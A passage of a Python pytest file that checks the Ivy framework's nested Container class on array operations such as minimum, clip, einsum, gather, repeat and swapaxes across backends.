assert np.allclose(ivy.to_numpy(container_std['b']['c']), np.array([8 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std.b.c), np.array([8 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std['b']['d']), np.array([6.]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std.b.d), np.array([6.]) ** 0.5)
def test_container_minimum(dev, call):
container = Container({'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev),
'd': ivy.array([3., 6., 9.], dev=dev)}})
other = Container({'a': ivy.array([2., 3., 2.], dev=dev),
'b': {'c': ivy.array([1., 5., 4.], dev=dev),
'd': ivy.array([4., 7., 8.], dev=dev)}})
# against number
container_minimum = container.minimum(5.)
assert np.allclose(ivy.to_numpy(container_minimum['a']), np.array([1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_minimum.a), np.array([1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_minimum['b']['c']), np.array([2., 4., 5.]))
assert np.allclose(ivy.to_numpy(container_minimum.b.c), np.array([2., 4., 5.]))
assert np.allclose(ivy.to_numpy(container_minimum['b']['d']), np.array([3., 5., 5.]))
assert np.allclose(ivy.to_numpy(container_minimum.b.d), np.array([3., 5., 5.]))
# against container
container_minimum = container.minimum(other)
assert np.allclose(ivy.to_numpy(container_minimum['a']), np.array([1., 2., 2.]))
assert np.allclose(ivy.to_numpy(container_minimum.a), np.array([1., 2., 2.]))
assert np.allclose(ivy.to_numpy(container_minimum['b']['c']), np.array([1., 4., 4.]))
assert np.allclose(ivy.to_numpy(container_minimum.b.c), np.array([1., 4., 4.]))
assert np.allclose(ivy.to_numpy(container_minimum['b']['d']), np.array([3., 6., 8.]))
assert np.allclose(ivy.to_numpy(container_minimum.b.d), np.array([3., 6., 8.]))
def test_container_maximum(dev, call):
container = Container({'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev),
'd': ivy.array([3., 6., 9.], dev=dev)}})
other = Container({'a': ivy.array([2., 3., 2.], dev=dev),
'b': {'c': ivy.array([1., 5., 4.], dev=dev),
'd': ivy.array([4., 7., 8.], dev=dev)}})
# against number
container_maximum = container.maximum(4.)
assert np.allclose(ivy.to_numpy(container_maximum['a']), np.array([4., 4., 4.]))
assert np.allclose(ivy.to_numpy(container_maximum.a), np.array([4., 4., 4.]))
assert np.allclose(ivy.to_numpy(container_maximum['b']['c']), np.array([4., 4., 6.]))
assert np.allclose(ivy.to_numpy(container_maximum.b.c), np.array([4., 4., 6.]))
assert np.allclose(ivy.to_numpy(container_maximum['b']['d']), np.array([4., 6., 9.]))
assert np.allclose(ivy.to_numpy(container_maximum.b.d), np.array([4., 6., 9.]))
# against container
container_maximum = container.maximum(other)
assert np.allclose(ivy.to_numpy(container_maximum['a']), np.array([2., 3., 3.]))
assert np.allclose(ivy.to_numpy(container_maximum.a), np.array([2., 3., 3.]))
assert np.allclose(ivy.to_numpy(container_maximum['b']['c']), np.array([2., 5., 6.]))
assert np.allclose(ivy.to_numpy(container_maximum.b.c), np.array([2., 5., 6.]))
assert np.allclose(ivy.to_numpy(container_maximum['b']['d']), np.array([4., 7., 9.]))
assert np.allclose(ivy.to_numpy(container_maximum.b.d), np.array([4., 7., 9.]))
def test_container_clip(dev, call):
container = Container({'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev),
'd': ivy.array([3., 6., 9.], dev=dev)}})
container_min = Container({'a': ivy.array([2., 0., 0.], dev=dev),
'b': {'c': ivy.array([0., 5., 0.], dev=dev),
'd': ivy.array([4., 7., 0.], dev=dev)}})
container_max = Container({'a': ivy.array([3., 1., 2.], dev=dev),
'b': {'c': ivy.array([1., 7., 5.], dev=dev),
'd': ivy.array([5., 8., 8.], dev=dev)}})
# against number
container_clipped = container.clip(2., 6.)
assert np.allclose(ivy.to_numpy(container_clipped['a']), np.array([2., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_clipped.a), np.array([2., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_clipped['b']['c']), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container_clipped.b.c), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container_clipped['b']['d']), np.array([3., 6., 6.]))
assert np.allclose(ivy.to_numpy(container_clipped.b.d), np.array([3., 6., 6.]))
if call is helpers.mx_call:
# MXNet clip does not support arrays for the min and max arguments
return
# against container
container_clipped = container.clip(container_min, container_max)
assert np.allclose(ivy.to_numpy(container_clipped['a']), np.array([2., 1., 2.]))
assert np.allclose(ivy.to_numpy(container_clipped.a), np.array([2., 1., 2.]))
assert np.allclose(ivy.to_numpy(container_clipped['b']['c']), np.array([1., 5., 5.]))
assert np.allclose(ivy.to_numpy(container_clipped.b.c), np.array([1., 5., 5.]))
assert np.allclose(ivy.to_numpy(container_clipped['b']['d']), np.array([4., 7., 8.]))
assert np.allclose(ivy.to_numpy(container_clipped.b.d), np.array([4., 7., 8.]))
# def test_container_clip_vector_norm(dev, call):
# container = Container({'a': ivy.array([[0.8, 2.2], [1.5, 0.2]], dev=dev)})
# container_clipped = container.clip_vector_norm(2.5, 2.)
# assert np.allclose(ivy.to_numpy(container_clipped['a']),
# np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]))
# assert np.allclose(ivy.to_numpy(container_clipped.a),
# np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]))
def test_container_einsum(dev, call):
dict_in = {'a': ivy.array([[1., 2.], [3., 4.], [5., 6.]], dev=dev),
'b': {'c': ivy.array([[2., 4.], [6., 8.], [10., 12.]], dev=dev),
'd': ivy.array([[-2., -4.], [-6., -8.], [-10., -12.]], dev=dev)}}
container = Container(dict_in)
container_einsummed = container.einsum('ij->i')
assert np.allclose(ivy.to_numpy(container_einsummed['a']), np.array([3., 7., 11.]))
assert np.allclose(ivy.to_numpy(container_einsummed.a), np.array([3., 7., 11.]))
assert np.allclose(ivy.to_numpy(container_einsummed['b']['c']), np.array([6., 14., 22.]))
assert np.allclose(ivy.to_numpy(container_einsummed.b.c), np.array([6., 14., 22.]))
assert np.allclose(ivy.to_numpy(container_einsummed['b']['d']), np.array([-6., -14., -22.]))
assert np.allclose(ivy.to_numpy(container_einsummed.b.d), np.array([-6., -14., -22.]))
# def test_container_vector_norm(dev, call):
# dict_in = {'a': ivy.array([[1., 2.], [3., 4.], [5., 6.]], dev=dev),
# 'b': {'c': ivy.array([[2., 4.], [6., 8.], [10., 12.]], dev=dev),
# 'd': ivy.array([[3., 6.], [9., 12.], [15., 18.]], dev=dev)}}
# container = Container(dict_in)
# container_normed = container.vector_norm(axis=(-1, -2))
# assert np.allclose(ivy.to_numpy(container_normed['a']), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed.a), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed['b']['c']), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed['b']['d']), 28.6182)
# assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.6182)
def test_container_matrix_norm(dev, call):
if call is helpers.mx_call:
# MXNet does not support matrix norm
pytest.skip()
dict_in = {'a': ivy.array([[1., 2.], [3., 4.], [5., 6.]], dev=dev),
'b': {'c': ivy.array([[2., 4.], [6., 8.], [10., 12.]], dev=dev),
'd': ivy.array([[3., 6.], [9., 12.], [15., 18.]], dev=dev)}}
container = Container(dict_in)
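    # the expected values below are the spectral norms (largest singular
    # values) of each 3x2 leaf; matrix_norm presumably defaults to the 2-norm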
container_normed = container.matrix_norm(axis=(-1, -2))
assert np.allclose(ivy.to_numpy(container_normed['a']), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed.a), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed['b']['c']), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed['b']['d']), 28.57655427)
assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.57655427)
def test_container_flip(dev, call):
dict_in = {'a': ivy.array([[1., 2.], [3., 4.], [5., 6.]], dev=dev),
'b': {'c': ivy.array([[2., 4.], [6., 8.], [10., 12.]], dev=dev),
'd': ivy.array([[-2., -4.], [-6., -8.], [-10., -12.]], dev=dev)}}
container = Container(dict_in)
container_flipped = container.flip(-1)
assert np.allclose(ivy.to_numpy(container_flipped['a']), np.array([[2., 1.], [4., 3.], [6., 5.]]))
assert np.allclose(ivy.to_numpy(container_flipped.a), np.array([[2., 1.], [4., 3.], [6., 5.]]))
assert np.allclose(ivy.to_numpy(container_flipped['b']['c']), np.array([[4., 2.], [8., 6.], [12., 10.]]))
assert np.allclose(ivy.to_numpy(container_flipped.b.c), np.array([[4., 2.], [8., 6.], [12., 10.]]))
assert np.allclose(ivy.to_numpy(container_flipped['b']['d']), np.array([[-4., -2.], [-8., -6.], [-12., -10.]]))
assert np.allclose(ivy.to_numpy(container_flipped.b.d), np.array([[-4., -2.], [-8., -6.], [-12., -10.]]))
def test_container_as_ones(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_ones = container.as_ones()
assert np.allclose(ivy.to_numpy(container_ones['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones['b']['c']), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones['b']['d']), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.d), np.array([1]))
def test_container_as_zeros(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_zeros = container.as_zeros()
assert np.allclose(ivy.to_numpy(container_zeros['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros['b']['c']), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.c), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros['b']['d']), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.d), np.array([0]))
def test_container_as_bools(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': [], 'd': True}}
container = Container(dict_in)
container_bools = container.as_bools()
assert container_bools['a'] is True
assert container_bools.a is True
assert container_bools['b']['c'] is False
assert container_bools.b.c is False
assert container_bools['b']['d'] is True
assert container_bools.b.d is True
def test_container_all_true(dev, call):
assert not Container({'a': ivy.array([1], dev=dev), 'b': {'c': [], 'd': True}}).all_true()
assert Container({'a': ivy.array([1], dev=dev), 'b': {'c': [1], 'd': True}}).all_true()
# noinspection PyBroadException
try:
assert Container({'a': ivy.array([1], dev=dev), 'b': {'c': [1], 'd': True}}).all_true(
assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
def test_container_all_false(dev, call):
assert Container({'a': False, 'b': {'c': [], 'd': 0}}).all_false()
assert not Container({'a': False, 'b': {'c': [1], 'd': 0}}).all_false()
# noinspection PyBroadException
try:
assert Container({'a': ivy.array([1], dev=dev), 'b': {'c': [1], 'd': True}}).all_false(
assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
# def test_container_as_random_uniform(dev, call):
# dict_in = {'a': ivy.array([1.], dev=dev),
# 'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([3.], dev=dev)}}
# container = Container(dict_in)
#
# container_random = container.as_random_uniform()
# assert (ivy.to_numpy(container_random['a']) != np.array([1.]))[0]
# assert (ivy.to_numpy(container_random.a) != np.array([1.]))[0]
# assert (ivy.to_numpy(container_random['b']['c']) != np.array([2.]))[0]
# assert (ivy.to_numpy(container_random.b.c) != np.array([2.]))[0]
# assert (ivy.to_numpy(container_random['b']['d']) != np.array([3.]))[0]
# assert (ivy.to_numpy(container_random.b.d) != np.array([3.]))[0]
def test_container_expand_dims(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_expanded_dims = container.expand_dims(0)
assert np.allclose(ivy.to_numpy(container_expanded_dims['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.d), np.array([[3]]))
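    # the key_chains argument restricts the operation to the listed leaves;
    # with to_apply=False the listed chains are instead skipped, and
    # prune_unapplied=True drops whichever leaves were left untouched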
# with key_chains to apply
container_expanded_dims = container.expand_dims(0, ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_expanded_dims['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.d), np.array([3]))
# with key_chains to apply pruned
container_expanded_dims = container.expand_dims(0, ['a', 'b/c'], prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_expanded_dims['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert 'b/d' not in container_expanded_dims
# with key_chains to not apply
container_expanded_dims = container.expand_dims(0, Container({'a': None, 'b': {'d': None}}), to_apply=False)
assert np.allclose(ivy.to_numpy(container_expanded_dims['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.d), np.array([3]))
# with key_chains to not apply pruned
container_expanded_dims = container.expand_dims(0, Container({'a': None, 'b': {'d': None}}), to_apply=False,
prune_unapplied=True)
assert 'a' not in container_expanded_dims
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert 'b/d' not in container_expanded_dims
# def test_container_clone(dev, call):
# dict_in = {'a': ivy.array([[1], [2], [3]], dev=dev),
# 'b': {'c': ivy.array([[2], [3], [4]], dev=dev),
# 'd': ivy.array([[3], [4], [5]], dev=dev)}}
# container = Container(dict_in)
#
# # devices
# devs = list()
# dev0 = dev
# devs.append(dev0)
# if 'gpu' in dev and ivy.num_gpus() > 1:
# idx = ivy.num_gpus() - 1
# dev1 = dev[:-1] + str(idx)
# devs.append(dev1)
#
# # without key_chains specification
# container_cloned = container.dev_clone(devs)
# assert isinstance(container_cloned, ivy.DevClonedItem)
# assert min([cont.dev_str == ds for ds, cont in container_cloned.items()])
# assert ivy.Container.multi_map(
# lambda xs, _: ivy.arrays_equal(xs), [c for c in container_cloned.values()]).all_true()
# @pytest.mark.parametrize(
# "devs_as_dict", [True, False])
# def test_container_distribute(devs_as_dict, dev, call):
# array_a = ivy.array([[1], [2], [3], [4]], dev=dev)
# array_bc = ivy.array([[2], [3], [4], [5]], dev=dev)
# array_bd = ivy.array([[3], [4], [5], [6]], dev=dev)
# dict_in = {'a': array_a, 'b': {'c': array_bc, 'd': array_bd}}
# container = Container(dict_in)
# batch_size = array_a.shape[0]
#
# if call is helpers.mx_call:
# # MXNet does not support splitting along an axis with a remainder after division.
# pytest.skip()
#
# # devices
# dev0 = dev
# devs = [dev0]
# if 'gpu' in dev and ivy.num_gpus() > 1:
# idx = ivy.num_gpus() - 1
# dev1 = dev[:-1] + str(idx)
# devs.append(dev1)
# if devs_as_dict:
# devs = dict(zip(devs, [int((1/len(devs))*4)]*len(devs)))
# num_devs = len(devs)
# sub_size = int(batch_size/num_devs)
#
# # without key_chains specification
# container_dist = container.dev_dist(devs)
# assert isinstance(container_dist, ivy.DevDistItem)
# assert min([cont.dev_str == ds for ds, cont in container_dist.items()])
# for i, sub_cont in enumerate(container_dist.values()):
# assert np.array_equal(ivy.to_numpy(sub_cont.a), ivy.to_numpy(array_a)[i*sub_size:i*sub_size+sub_size])
# assert np.array_equal(ivy.to_numpy(sub_cont.b.c), ivy.to_numpy(array_bc)[i*sub_size:i*sub_size+sub_size])
# assert np.array_equal(ivy.to_numpy(sub_cont.b.d), ivy.to_numpy(array_bd)[i*sub_size:i*sub_size+sub_size])
def test_container_unstack(dev, call):
dict_in = {'a': ivy.array([[1], [2], [3]], dev=dev),
'b': {'c': ivy.array([[2], [3], [4]], dev=dev),
'd': ivy.array([[3], [4], [5]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_unstacked = container.unstack(0)
for cont, a, bc, bd in zip(container_unstacked, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont['a']), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont['b']['c']), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont['b']['d']), np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d), np.array([bd]))
def test_container_split(dev, call):
dict_in = {'a': ivy.array([[1], [2], [3]], dev=dev),
'b': {'c': ivy.array([[2], [3], [4]], dev=dev),
'd': ivy.array([[3], [4], [5]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_split = container.split(1, -1)
for cont, a, bc, bd in zip(container_split, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont['a'])[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a)[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont['b']['c'])[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c)[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont['b']['d'])[0], np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d)[0], np.array([bd]))
def test_container_gather(dev, call):
dict_in = {'a': ivy.array([1, 2, 3, 4, 5, 6], dev=dev),
'b': {'c': ivy.array([2, 3, 4, 5], dev=dev), 'd': ivy.array([10, 9, 8, 7, 6], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather(ivy.array([1, 3], dev=dev))
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([9, 7]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([9, 7]))
# with key_chains to apply
container_gathered = container.gather(ivy.array([1, 3], dev=dev), -1, ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([10, 9, 8, 7, 6]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to apply pruned
container_gathered = container.gather(ivy.array([1, 3], dev=dev), -1, ['a', 'b/c'], prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert 'b/d' not in container_gathered
# with key_chains to not apply
container_gathered = container.gather(ivy.array([1, 3], dev=dev), -1,
Container({'a': None, 'b': {'d': None}}),
to_apply=False)
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([1, 2, 3, 4, 5, 6]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([1, 2, 3, 4, 5, 6]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([10, 9, 8, 7, 6]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to not apply pruned
container_gathered = container.gather(ivy.array([1, 3], dev=dev), -1,
Container({'a': None, 'b': {'d': None}}),
to_apply=False, prune_unapplied=True)
assert 'a' not in container_gathered
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert 'b/d' not in container_gathered
def test_container_gather_nd(dev, call):
dict_in = {'a': ivy.array([[[1, 2], [3, 4]],
[[5, 6], [7, 8]]], dev=dev),
'b': {'c': ivy.array([[[8, 7], [6, 5]],
[[4, 3], [2, 1]]], dev=dev),
'd': ivy.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev))
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([[6, 8], [10, 12]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([[6, 8], [10, 12]]))
# with key_chains to apply
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev), ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]]))
# with key_chains to apply pruned
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev), ['a', 'b/c'],
prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert 'b/d' not in container_gathered
# with key_chains to not apply
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev),
Container({'a': None, 'b': {'d': None}}),
to_apply=False)
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([[[1, 2], [3, 4]],
[[5, 6], [7, 8]]]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[[1, 2], [3, 4]],
[[5, 6], [7, 8]]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]]))
# with key_chains to not apply pruned
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev),
Container({'a': None, 'b': {'d': None}}),
to_apply=False, prune_unapplied=True)
assert 'a' not in container_gathered
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert 'b/d' not in container_gathered
def test_container_repeat(dev, call):
if call is helpers.mx_call:
# MXNet does not support repeats specified as array
pytest.skip()
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1)
assert np.allclose(ivy.to_numpy(container_repeated['a']), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated.a), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['d']), np.array([[10., 10., 9., 7., 7., 7.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.d), np.array([[10., 10., 9., 7., 7., 7.]]))
# with key_chains to apply
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1, ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_repeated['a']), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated.a), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['d']), np.array([[10., 9., 8., 7.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.d), np.array([[10., 9., 8., 7.]]))
# with key_chains to apply pruned
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1, ['a', 'b/c'],
prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_repeated['a']), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated.a), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert 'b/d' not in container_repeated
# with key_chains to not apply
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1,
Container({'a': None, 'b': {'d': None}}),
to_apply=False)
assert np.allclose(ivy.to_numpy(container_repeated['a']), np.array([[0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated.a), np.array([[0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['d']), np.array([[10., 9., 8., 7.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.d), np.array([[10., 9., 8., 7.]]))
# with key_chains to not apply pruned
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1,
Container({'a': None, 'b': {'d': None}}),
to_apply=False, prune_unapplied=True)
assert 'a' not in container_repeated
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert 'b/d' not in container_repeated
def test_container_swapaxes(dev, call):
if call is helpers.mx_call:
        # this test is skipped for the MXNet backend
pytest.skip()
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_swapped = container.swapaxes(0, 1)
assert np.allclose(ivy.to_numpy(container_swapped['a']), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped.a), np.array([[0.], [1.], [2.], [3.]]))
